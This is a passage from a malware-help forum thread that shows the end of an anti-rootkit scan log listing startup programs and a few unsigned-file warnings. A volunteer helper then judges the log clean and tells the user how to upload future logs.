15:34:02.0836 0x04bc  [ 4C7C4CADD2515329D9D40D7DC91C5930, 7F0BB59DF698C949217036F12579FFEDDD3444CFA26376824314E88E563EEF0D ] C:\Program Files (x86)\Intel\Intel® Management Engine Components\IMSS\PIconStartup.exe
15:34:02.0851 0x04bc  IMSS - ok
15:34:03.0053 0x04bc  [ 47EA5F76FAB723C61AB4A0D79BAD512C, A7A38EB0A7068B160E6949945EF639F999A06AE35746F6E79C7350745798E5C9 ] C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
15:34:03.0069 0x04bc  Adobe ARM - ok
15:34:03.0209 0x04bc  CitrixReceiver - ok
15:34:03.0364 0x04bc  [ C17FC2B8D522562B7A098345CC8851C3, D1AB9197775ECE8E4D7B4568994608BF7A6D771E0936D81D93C31C10469F9EFA ] C:\Program Files (x86)\Citrix\ICA Client\concentr.exe
15:34:03.0380 0x04bc  ConnectionCenter - ok
15:34:03.0427 0x04bc  [ A72FB8DCD04639175AC4C59847BE8DA2, 23D972CA6AE5DA997D6C4F79A2F94C4C18A3EED23785F87E239620F3D1E9EA60 ] C:\Program Files (x86)\Citrix\ICA Client\redirector.exe
15:34:03.0442 0x04bc  Redirector - ok
15:34:03.0566 0x04bc  [ 35FD33EAE23AF69715EE3231A9F15B82, C7351F3537F4B938E4E8A8A8DD59039298F9B09678A4BC09B2A362DC4B25E2C0 ] C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\Acrobat_sl.exe
15:34:03.0582 0x04bc  Adobe Acrobat Speed Launcher - ok
15:34:03.0644 0x04bc  [ 0FE0EDF01CEA3BEB2E65A904BB87525E, 8846CE71FC5DD86151F467B656D886A8E81E337B10A591097E5695BDB2821447 ] C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\Acrotray.exe
15:34:03.0660 0x04bc  Acrobat Assistant 8.0 - ok
15:34:03.0722 0x04bc  [ 0EF0822810009D58118CCDFD098FA9F4, 9FAA263057898BCDBCB0A064C463F48D149474AA339A3C4C47626CC118750D2D ] C:\Program Files (x86)\iTunes\iTunesHelper.exe
15:34:03.0722 0x04bc  iTunesHelper - ok
15:34:03.0924 0x04bc  [ DCCA4B04AF87E52EF9EAA2190E06CBAC, 8858CFD159BB32AE9FCCA1A79EA83C876D481A286E914071D48F42FCA5B343D8 ] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe
15:34:04.0017 0x04bc  Sidebar - ok
15:34:04.0049 0x04bc  [ 0FA760BF380B08D0B67B5507CD8B32AA, 0F73A7F64C4FDAB98CD3A865CC54B3A7195761530FCB115B725CC5A9FB738739 ] C:\Windows\System32\mctadmin.exe
15:34:04.0080 0x04bc  mctadmin - ok
15:34:04.0126 0x04bc  [ DCCA4B04AF87E52EF9EAA2190E06CBAC, 8858CFD159BB32AE9FCCA1A79EA83C876D481A286E914071D48F42FCA5B343D8 ] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe
15:34:04.0142 0x04bc  Sidebar - ok
15:34:04.0157 0x04bc  [ 0FA760BF380B08D0B67B5507CD8B32AA, 0F73A7F64C4FDAB98CD3A865CC54B3A7195761530FCB115B725CC5A9FB738739 ] C:\Windows\System32\mctadmin.exe
15:34:04.0157 0x04bc  mctadmin - ok
15:34:04.0640 0x04bc  [ 4DF6E378A00B6F89CB35078054057C36, 981BE3859AC48F43E739885BDA6756C5583BFD7353A57669067C8FB170DAE097 ] C:\Program Files\CCleaner\CCleaner64.exe
15:34:04.0733 0x04bc  CCleaner Monitoring - ok
15:34:04.0951 0x04bc  [ 45DB6103F0930C9845E4D9E3095D4F8D, 20A22470490687F5ED3D075BF8FE80267EE31516539F655FCD25A8C11B498EC7 ] C:\Users\boylem1\AppData\Local\NEC\UC700\Nuvshost.exe
15:34:04.0966 0x04bc  Nuvshot.exe - detected UnsignedFile.Multi.Generic ( 1 )
15:34:04.0966 0x04bc  Nuvshot.exe ( UnsignedFile.Multi.Generic ) - warning
15:34:05.0013 0x04bc  [ 57EB157779838C43B47F78721740FA7E, 6F780F6A2AF5F0DEB4A6B38482D1FB579DE6A3225A8ED5E3457720111A75C059 ] C:\Users\boylem1\AppData\Local\NEC\UC700\UC700.exe
15:34:05.0059 0x04bc  UC700.exe - detected UnsignedFile.Multi.Generic ( 1 )
15:34:05.0059 0x04bc  UC700.exe ( UnsignedFile.Multi.Generic ) - warning
15:34:05.0059 0x04bc  ============================================================
15:34:05.0059 0x04bc  Scan finished
15:34:05.0059 0x04bc  ============================================================
15:34:05.0059 0x062c  Detected object count: 6
15:34:05.0059 0x062c  Actual detected object count: 6
15:34:48.0188 0x062c  Altiris Deployment Agent ( UnsignedFile.Multi.Generic ) - skipped by user
15:34:48.0188 0x062c  Altiris Deployment Agent ( UnsignedFile.Multi.Generic ) - User select action: Skip
15:34:48.0188 0x062c  FLEXnet Licensing Service ( UnsignedFile.Multi.Generic ) - skipped by user
15:34:48.0188 0x062c  FLEXnet Licensing Service ( UnsignedFile.Multi.Generic ) - User select action: Skip
15:34:48.0188 0x062c  DagentUI ( UnsignedFile.Multi.Generic ) - skipped by user
15:34:48.0188 0x062c  DagentUI ( UnsignedFile.Multi.Generic ) - User select action: Skip
15:34:48.0203 0x062c  Cisco Jabber ( UnsignedFile.Multi.Generic ) - skipped by user
15:34:48.0203 0x062c  Cisco Jabber ( UnsignedFile.Multi.Generic ) - User select action: Skip
15:34:48.0203 0x062c  Nuvshot.exe ( UnsignedFile.Multi.Generic ) - skipped by user
15:34:48.0203 0x062c  Nuvshot.exe ( UnsignedFile.Multi.Generic ) - User select action: Skip
15:34:48.0203 0x062c  UC700.exe ( UnsignedFile.Multi.Generic ) - skipped by user
15:34:48.0203 0x062c  UC700.exe ( UnsignedFile.Multi.Generic ) - User select action: Skip
15:35:29.0683 0x0f78  Deinitialize success
 



#13 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:11:41 PM

Posted 06 November 2014 - 03:53 PM

Hi,

 

You can upload the log at http://www.zippyshare.com/ and post the download link in your next reply instead of doing multiple posts. :)

 

 

Regards,

Georgi


cXfZ4wS.png


#14 Shate'

Shate'
  • Topic Starter

  • Members
  • 72 posts
  • OFFLINE
  •  
  • Local time:03:41 PM

Posted 06 November 2014 - 04:05 PM

ooops



#15 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:11:41 PM

Posted 06 November 2014 - 04:39 PM

Hi,

 

That log is clean too. You can proceed with the rest of the steps. :)

 

 

Regards,

Georgi


cXfZ4wS.png





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users